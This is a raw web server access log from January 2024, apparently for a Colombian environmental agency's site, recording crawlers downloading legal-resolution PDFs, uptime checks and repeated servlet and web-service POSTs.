216.244.66.195 - - [17/Jan/2024:02:11:22 -0500] "GET /BLA/resoluciones/AUTOS%202007/0226.pdf HTTP/1.1" 200 32240
216.244.66.195 - - [17/Jan/2024:02:11:41 -0500] "GET /BLA/resoluciones/AUTOS%202007/0742.pdf HTTP/1.1" 200 20133
201.245.192.253 - - [17/Jan/2024:02:11:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:11:59 -0500] "GET /BLA/resoluciones/AUTOS%202007/0788.pdf HTTP/1.1" 200 75589
172.22.2.4 - - [17/Jan/2024:02:10:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60996
216.244.66.195 - - [17/Jan/2024:02:12:17 -0500] "GET /BLA/resoluciones/AUTOS%202007/0816.pdf HTTP/1.1" 200 156703
216.244.66.195 - - [17/Jan/2024:02:12:33 -0500] "GET /BLA/resoluciones/AUTOS%202007/1311.pdf HTTP/1.1" 200 189052
201.245.192.253 - - [17/Jan/2024:02:12:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:12:49 -0500] "GET /BLA/resoluciones/AUTOS%202007/1581.pdf HTTP/1.1" 200 31098
216.244.66.195 - - [17/Jan/2024:02:13:03 -0500] "GET /BLA/resoluciones/AUTOS%202007/1676.pdf HTTP/1.1" 200 651867
216.245.221.92 - - [17/Jan/2024:02:13:16 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [17/Jan/2024:02:13:19 -0500] "GET /BLA/resoluciones/AUTOS%202009/0691.pdf HTTP/1.1" 200 66941
216.244.66.195 - - [17/Jan/2024:02:13:31 -0500] "GET /BLA/resoluciones/AUTOS%202009/0771.pdf HTTP/1.1" 200 161417
216.244.66.195 - - [17/Jan/2024:02:13:44 -0500] "GET /BLA/resoluciones/AUTOS%202009/0834.pdf HTTP/1.1" 200 75129
201.245.192.253 - - [17/Jan/2024:02:13:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:13:55 -0500] "GET /BLA/resoluciones/AUTOS%202009/0857.pdf HTTP/1.1" 200 90732
199.16.157.182 - - [17/Jan/2024:02:14:00 -0500] "GET /images/cr%C3%B3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
216.244.66.195 - - [17/Jan/2024:02:14:04 -0500] "GET /BLA/resoluciones/AUTOS%202009/0895.pdf HTTP/1.1" 200 123809
216.244.66.195 - - [17/Jan/2024:02:14:12 -0500] "GET /BLA/resoluciones/AUTOS%202009/0918.pdf HTTP/1.1" 200 122011
216.244.66.195 - - [17/Jan/2024:02:14:20 -0500] "GET /BLA/resoluciones/AUTOS%202009/1010.pdf HTTP/1.1" 200 121658
201.245.192.253 - - [17/Jan/2024:02:14:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38371
201.245.192.253 - - [17/Jan/2024:02:14:25 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [17/Jan/2024:02:14:26 -0500] "GET /BLA/resoluciones/AUTOS%202009/1340.pdf HTTP/1.1" 200 96559
201.245.192.253 - - [17/Jan/2024:02:14:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38949
216.244.66.195 - - [17/Jan/2024:02:14:32 -0500] "GET /BLA/resoluciones/AUTOS%202009/1505.pdf HTTP/1.1" 200 99889
201.245.192.253 - - [17/Jan/2024:02:14:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:14:37 -0500] "GET /BLA/resoluciones/AUTOS%202009/1567.pdf HTTP/1.1" 200 124442
216.244.66.195 - - [17/Jan/2024:02:14:41 -0500] "GET /BLA/resoluciones/AUTOS%202009/1760.pdf HTTP/1.1" 200 188628
216.244.66.195 - - [17/Jan/2024:02:14:45 -0500] "GET /BLA/resoluciones/AUTOS%202009/1790.pdf HTTP/1.1" 200 99417
216.244.66.195 - - [17/Jan/2024:02:14:48 -0500] "GET /BLA/resoluciones/AUTOS%202009/1832.pdf HTTP/1.1" 200 104390
216.244.66.195 - - [17/Jan/2024:02:14:51 -0500] "GET /BLA/resoluciones/AUTOS%202009/1848.pdf HTTP/1.1" 200 99676
216.244.66.195 - - [17/Jan/2024:02:14:54 -0500] "GET /BLA/resoluciones/AUTOS%202009/1868.pdf HTTP/1.1" 200 100882
216.244.66.195 - - [17/Jan/2024:02:14:57 -0500] "GET /BLA/resoluciones/AUTOS%202009/1919.pdf HTTP/1.1" 200 363844
216.244.66.195 - - [17/Jan/2024:02:15:00 -0500] "GET /BLA/resoluciones/AUTOS%202009/2022.pdf HTTP/1.1" 200 101826
216.244.66.195 - - [17/Jan/2024:02:15:02 -0500] "GET /BLA/resoluciones/AUTOS%202009/2173.pdf HTTP/1.1" 200 106227
216.244.66.195 - - [17/Jan/2024:02:15:04 -0500] "GET /BLA/resoluciones/AUTOS%202009/2196.pdf HTTP/1.1" 200 113729
216.244.66.195 - - [17/Jan/2024:02:15:07 -0500] "GET /BLA/resoluciones/AUTOS%202009/2564.pdf HTTP/1.1" 200 104465
216.244.66.195 - - [17/Jan/2024:02:15:09 -0500] "GET /BLA/resoluciones/AUTOS%202009/2728.pdf HTTP/1.1" 200 80834
216.244.66.195 - - [17/Jan/2024:02:15:11 -0500] "GET /BLA/resoluciones/AUTOS%202009/2771.pdf HTTP/1.1" 200 100303
216.244.66.195 - - [17/Jan/2024:02:15:13 -0500] "GET /BLA/resoluciones/AUTOS%202009/2852.pdf HTTP/1.1" 200 70809
216.244.66.195 - - [17/Jan/2024:02:15:15 -0500] "GET /BLA/resoluciones/AUTOS%202009/2863.pdf HTTP/1.1" 200 101708
216.244.66.195 - - [17/Jan/2024:02:15:17 -0500] "GET /BLA/resoluciones/AUTOS%202009/2904.pdf HTTP/1.1" 200 85880
216.244.66.195 - - [17/Jan/2024:02:15:19 -0500] "GET /BLA/resoluciones/AUTOS%202011/0005.pdf HTTP/1.1" 200 277118
216.244.66.195 - - [17/Jan/2024:02:15:21 -0500] "GET /BLA/resoluciones/AUTOS%202011/0023.pdf HTTP/1.1" 200 182705
216.244.66.195 - - [17/Jan/2024:02:15:24 -0500] "GET /BLA/resoluciones/AUTOS%202011/0455.pdf HTTP/1.1" 200 259437
216.244.66.195 - - [17/Jan/2024:02:15:27 -0500] "GET /BLA/resoluciones/AUTOS%202011/0820.pdf HTTP/1.1" 200 403913
201.245.192.253 - - [17/Jan/2024:02:15:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
216.244.66.195 - - [17/Jan/2024:02:15:30 -0500] "GET /BLA/resoluciones/AUTOS%202018/0226.pdf HTTP/1.1" 200 295849
216.244.66.195 - - [17/Jan/2024:02:15:33 -0500] "GET /BLA/resoluciones/AUTOS%202018/0423.pdf HTTP/1.1" 200 315852
216.244.66.195 - - [17/Jan/2024:02:15:46 -0500] "GET /BLA/resoluciones/AUTOS%202018/0617.pdf HTTP/1.1" 200 292602
201.245.192.253 - - [17/Jan/2024:02:15:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:15:55 -0500] "GET /BLA/resoluciones/AUTOS%202018/1015.pdf HTTP/1.1" 200 297454
216.244.66.195 - - [17/Jan/2024:02:16:03 -0500] "GET /BLA/resoluciones/AUTOS%202018/1393.pdf HTTP/1.1" 200 279736
216.244.66.195 - - [17/Jan/2024:02:16:11 -0500] "GET /BLA/resoluciones/AUTOS%202018/2294.pdf HTTP/1.1" 200 284154
216.244.66.195 - - [17/Jan/2024:02:16:18 -0500] "GET /BLA/resoluciones/AUTOS%202018/2959.pdf HTTP/1.1" 200 254799
216.244.66.195 - - [17/Jan/2024:02:16:23 -0500] "GET /BLA/resoluciones/AUTOS%202018/3005.pdf HTTP/1.1" 200 275317
216.244.66.195 - - [17/Jan/2024:02:16:28 -0500] "GET /BLA/resoluciones/AUTOS%202018/3644.pdf HTTP/1.1" 200 306900
201.245.192.253 - - [17/Jan/2024:02:16:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:16:35 -0500] "GET /BLA/resoluciones/AUTOS%202018/3845.pdf HTTP/1.1" 200 272541
216.244.66.195 - - [17/Jan/2024:02:16:40 -0500] "GET /BLA/resoluciones/AUTOS%202022/0351.pdf HTTP/1.1" 200 408020
216.244.66.195 - - [17/Jan/2024:02:16:45 -0500] "GET /BLA/resoluciones/AUTOS%202022/0435.pdf HTTP/1.1" 200 357009
216.244.66.195 - - [17/Jan/2024:02:16:49 -0500] "GET /BLA/resoluciones/AUTOS%202022/1980.pdf HTTP/1.1" 200 310706
216.244.66.195 - - [17/Jan/2024:02:16:53 -0500] "GET /BLA/resoluciones/AUTOS%202022/2068.pdf HTTP/1.1" 200 377823
216.244.66.195 - - [17/Jan/2024:02:16:56 -0500] "GET /BLA/resoluciones/AUTOS%202022/2358.pdf HTTP/1.1" 200 398090
216.244.66.195 - - [17/Jan/2024:02:17:00 -0500] "GET /BLA/resoluciones/AUTOS%202022/2982.pdf HTTP/1.1" 200 351055
216.244.66.195 - - [17/Jan/2024:02:17:04 -0500] "GET /BLA/resoluciones/AUTOS%202022/3380.pdf HTTP/1.1" 200 1131181
172.22.2.4 - - [17/Jan/2024:02:17:04 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9684
172.22.2.4 - - [17/Jan/2024:02:15:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [17/Jan/2024:02:17:16 -0500] "GET /BLA/resoluciones/AUTOS%202022/3480.pdf HTTP/1.1" 200 1296493
216.244.66.195 - - [17/Jan/2024:02:17:27 -0500] "GET /BLA/resoluciones/AUTOS%202022/4243.pdf HTTP/1.1" 200 2167934
172.22.2.4 - - [17/Jan/2024:02:16:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
216.244.66.195 - - [17/Jan/2024:02:17:48 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202017/&sort=date&order=asc HTTP/1.1" 200 287174
201.245.192.253 - - [17/Jan/2024:02:17:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:02:16:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48307
172.22.2.4 - - [17/Jan/2024:02:18:08 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
216.245.221.92 - - [17/Jan/2024:02:18:16 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.19 - - [17/Jan/2024:02:18:17 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-148.pdf HTTP/1.1" 200 751836
201.245.192.253 - - [17/Jan/2024:02:18:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:18:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38371
201.245.192.253 - - [17/Jan/2024:02:19:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38949
172.22.2.4 - - [17/Jan/2024:02:18:10 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 62905
40.77.167.22 - - [17/Jan/2024:02:19:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/02528.pdf HTTP/1.1" 200 483540
201.245.192.253 - - [17/Jan/2024:02:19:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:20:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
201.245.192.253 - - [17/Jan/2024:02:20:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:21:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:22:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:02:21:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [17/Jan/2024:02:23:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [17/Jan/2024:02:22:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58666
157.55.39.54 - - [17/Jan/2024:02:23:51 -0500] "GET /BLA/resoluciones/AUTOS%202020/0319.pdf HTTP/1.1" 200 337638
201.245.192.253 - - [17/Jan/2024:02:23:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:24:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38371
201.245.192.253 - - [17/Jan/2024:02:24:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38949
201.245.192.253 - - [17/Jan/2024:02:24:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:25:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
201.245.192.253 - - [17/Jan/2024:02:25:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:26:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:27:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [17/Jan/2024:02:28:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:02:28:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:28:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38371
172.22.2.4 - - [17/Jan/2024:02:27:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:02:29:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38949
66.249.66.166 - - [17/Jan/2024:02:29:34 -0500] "GET /documents/10184/1894576/pieza-dia-abejas-20-infografia-20-mayo.jpg/bc45f1db-95e7-45fb-ba4a-1c8251c0eeeb?t=1622085274381 HTTP/1.1" 404 1035
172.22.2.4 - - [17/Jan/2024:02:28:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60529
201.245.192.253 - - [17/Jan/2024:02:29:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:30:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
201.245.192.253 - - [17/Jan/2024:02:30:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:31:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:32:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [17/Jan/2024:02:33:16 -0500] "HEAD / HTTP/1.1" 200 -
152.61.128.50 - - [17/Jan/2024:02:33:24 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [17/Jan/2024:02:33:26 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [17/Jan/2024:02:33:26 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [17/Jan/2024:02:33:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
168.119.253.32 - - [17/Jan/2024:02:34:00 -0500] "GET / HTTP/1.1" 200 319
168.119.253.32 - - [17/Jan/2024:02:34:01 -0500] "GET / HTTP/1.1" 200 4720
152.61.192.232 - - [17/Jan/2024:02:34:10 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [17/Jan/2024:02:34:10 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [17/Jan/2024:02:34:11 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [17/Jan/2024:02:34:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38371
201.245.192.253 - - [17/Jan/2024:02:34:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38949
201.245.192.253 - - [17/Jan/2024:02:34:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:02:33:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:02:35:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
172.22.2.4 - - [17/Jan/2024:02:33:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59050
201.245.192.253 - - [17/Jan/2024:02:35:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:36:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.20 - - [17/Jan/2024:02:36:47 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Diseno%20pertenecientes%20al%20mobiliario%20urbano%20M10-M160/PARTE%20A/Dise%C3%B1o%20de%20Elementos%20M-31.pdf HTTP/1.1" 200 758526
201.245.192.253 - - [17/Jan/2024:02:37:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:38:08 -0500] "GET /robots.txt HTTP/1.1" 404 1018
216.245.221.92 - - [17/Jan/2024:02:38:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:02:38:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:38:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38371
66.249.66.19 - - [17/Jan/2024:02:38:46 -0500] "GET /Residuos/textiles/files/guia_textiles.pdf HTTP/1.1" 200 12356716
201.245.192.253 - - [17/Jan/2024:02:39:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38949
201.245.192.253 - - [17/Jan/2024:02:39:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:40:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
172.22.2.4 - - [17/Jan/2024:02:38:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:02:40:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:02:39:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60996
201.245.192.253 - - [17/Jan/2024:02:41:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:42:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [17/Jan/2024:02:43:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:02:43:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [17/Jan/2024:02:44:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.20 - - [17/Jan/2024:02:44:51 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/03326.pdf HTTP/1.1" 200 273425
201.245.192.253 - - [17/Jan/2024:02:45:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
201.245.192.253 - - [17/Jan/2024:02:45:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:02:44:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:02:46:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:02:45:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58666
201.245.192.253 - - [17/Jan/2024:02:47:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [17/Jan/2024:02:48:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:02:48:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:49:21 -0500] "GET /BLA/resoluciones/AUTOS%202022/3238.pdf HTTP/1.1" 200 355170
172.22.2.4 - - [17/Jan/2024:02:47:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62905
216.244.66.195 - - [17/Jan/2024:02:49:33 -0500] "GET /BLA/resoluciones/AUTOS%202022/3512.pdf HTTP/1.1" 200 389110
201.245.192.253 - - [17/Jan/2024:02:49:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:50:10 -0500] "GET /BLA/resoluciones/AUTOS%202022/4557.pdf HTTP/1.1" 200 355864
201.245.192.253 - - [17/Jan/2024:02:50:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39113
66.249.66.39 - - [17/Jan/2024:02:50:22 -0500] "GET /dia-mundial-de-los-humedales-mas-de-60-aves-alzaron-vuelo-en-el-humedal-el-tunjo.html HTTP/1.1" 304 -
201.245.192.253 - - [17/Jan/2024:02:50:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [17/Jan/2024:02:50:43 -0500] "GET /BLA/resoluciones/AUTOS%202022/4908.pdf HTTP/1.1" 200 369985
216.244.66.195 - - [17/Jan/2024:02:51:13 -0500] "GET /BLA/resoluciones/AUTOS%202022/4909.pdf HTTP/1.1" 200 394497
201.245.192.253 - - [17/Jan/2024:02:51:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:02:50:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:02:52:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6947c1f7f67e648598dd0e716ce7e24d2.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [17/Jan/2024:02:51:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60996
216.245.221.92 - - [17/Jan/2024:02:53:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [17/Jan/2024:02:53:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6bd6ae21f678742bfae36a90452e8c389.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
